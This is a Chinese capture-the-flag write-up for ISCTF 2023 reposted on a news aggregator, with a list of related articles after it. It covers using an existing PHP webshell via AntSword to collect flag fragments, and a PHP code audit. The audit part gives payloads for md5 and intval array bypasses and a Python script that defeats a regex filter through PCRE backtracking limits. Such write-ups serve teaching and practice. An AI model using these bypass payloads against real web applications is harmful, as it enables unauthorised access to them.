当前位置: 首页 > news >正文

23isctf

where_is_the_flag

1.打开环境,上面有一句话木马,直接蚁剑上

flag1:蚁剑连接上就可以直接看见,FLAG1:Yunxi{d0c0

flag2:在根目录下就有   797a-4697-

 

flag3: 在主页面有一个start.sh里面有提示信息  

4dfe-9b48-50ff544c2273}

 start.sh的内容

#!/bin/sh
sed -i "s/{{FLAG1}}/${FLAG:0:10}/" /var/www/localhost/htdocs/flag.php
echo ${FLAG:10:10} > /flag2
export FLAG3=${FLAG:20}
FLAG3=${FLAG:20}
export FLAG="flag"
FLAG="flag"
httpd -D FOREGROUND

解释如下

sed -i "s/{{FLAG1}}/${FLAG:0:10}/" /var/www/localhost/htdocs/flag.php:这行命令使用sed(流编辑器)来处理/var/www/localhost/htdocs/flag.php文件。-i选项表示直接修改文件。s/{{FLAG1}}/${FLAG:0:10}/是sed的替换命令,它将文件中的{{FLAG1}}替换为环境变量FLAG的前10个字符。echo ${FLAG:10:10} > /flag2:这行命令使用echo输出FLAG环境变量的第11到第20个字符(因为索引从0开始),并将输出重定向到/flag2文件。export FLAG3=${FLAG:20}:这行命令将FLAG环境变量的第21个字符开始的子字符串赋值给FLAG3环境变量,并使用export命令使其在当前shell及其子进程中可用。FLAG3=${FLAG:20}:这行命令与上一行类似,也是将FLAG环境变量的第21个字符开始的子字符串赋值给FLAG3变量,但没有使用export,所以这个变量只在当前shell中有效。export FLAG="flag":这行命令将FLAG环境变量的值设置为字符串"flag",并使用export命令使其在当前shell及其子进程中可用

打开终端,执行命令echo $FLAG3

绕进你的心里

1.代码审计

<?php
highlight_file(__FILE__);
error_reporting(0);
require 'flag.php';
$str = (String)$_POST['pan_gu'];
$num = $_GET['zhurong'];
$lida1 = $_GET['hongmeng'];
$lida2 = $_GET['shennong'];
if($lida1 !== $lida2 && md5($lida1) === md5($lida2)){   //数组绕过echo "md5绕过了!";if(preg_match("/[0-9]/", $num)){     //匹配数字die('你干嘛?哎哟!');}elseif(intval($num)){                //匹配字符if(preg_match('/.+?ISCTF/is', $str)){die("再想想!");}if(stripos($str, '2023ISCTF') === false){die("就差一点点啦!");}echo $flag;}
}
?> 

2.payload:后面两个数组绕过不解释了,解释一下前面的绕过

?zhurong[]=1&hongmeng[]=2&shennong[]=3

第二层,绕过intval()限制,数字绕过

intval() 转换数组类型时,不关心数组中的内容,只判断数组中有没有元素。

    「空数组」返回 0
    「非空数组」返回 1

3.intval()限制字符绕过

第三层的绕过关键在pan_gu利用正则最大回溯绕过,看到'/.+?ISCTF/is'这种就要想到了,我们通过发送超长字符串的方式,使正则执行失败,最后绕过目标对PHP语言的限制。

网上找的通用回溯poc如下,需要对应不同题目改脚本:

import requestsurl = "http://172.16.17.201:50125/?zhurong[]=1&hongmeng[]=2&shennong[]=3"data = {'pan_gu': 'aaaaaaaaaa' * 250000 + '2023ISCTF'}r = requests.post(url, data=data)print(r.text)


http://www.mrgr.cn/news/68072.html

相关文章:

  • Java 网络编程(一)—— UDP数据报套接字编程
  • 微调LLM时,full、freeze、lora区别
  • 【伙伴云-注册安全分析报告】
  • 市场分化!汽车零部件「变天」
  • Flutter常用命令整理
  • JavaScript中的if、else if、else 和 switch
  • 职场高手揭秘,细节如何左右你的成败与升迁之路
  • 第18篇 :关于SystemVerilog中的约束随机机制(一)
  • 基于百度飞桨paddle的paddlepaddle2.4.2等系列项目的运行
  • RHCSA习题练习
  • 并发编程(8)—— std::async、std::future 源码解析
  • 软件开发流程图的绘制与解析
  • 大数据数据存储层MemSQL, HBase与HDFS
  • 聊一聊SpringBoot中的自定义Starter
  • 移除元素(java)
  • 【猜数字】C语言小游戏
  • day05(单片机)SPI+数码管
  • 算法通关(4)-- 前缀树
  • 介绍一下memcpy(c基础)
  • 那些在Nop代码生成器中用到的DSL
  • 汉诺塔问题代码分享及思路分享(c基础)
  • 高德 阿里231滑块 分析
  • STM32项目---水质水位检测
  • D365 使用电子邮件模板在 X++ 中发送电子邮件
  • 【UE5】Cesium GlobePawn 如何Fly To
  • uniapp中使用原生ajax上传文件并携带其他数据,实时展示上传进度